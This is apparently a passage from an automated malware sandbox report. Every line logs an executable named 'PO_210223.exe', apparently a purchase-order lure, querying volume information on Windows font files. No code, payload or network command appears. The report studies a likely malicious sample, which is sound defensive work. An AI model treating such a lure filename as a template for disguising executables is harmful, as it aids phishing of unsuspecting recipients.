Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
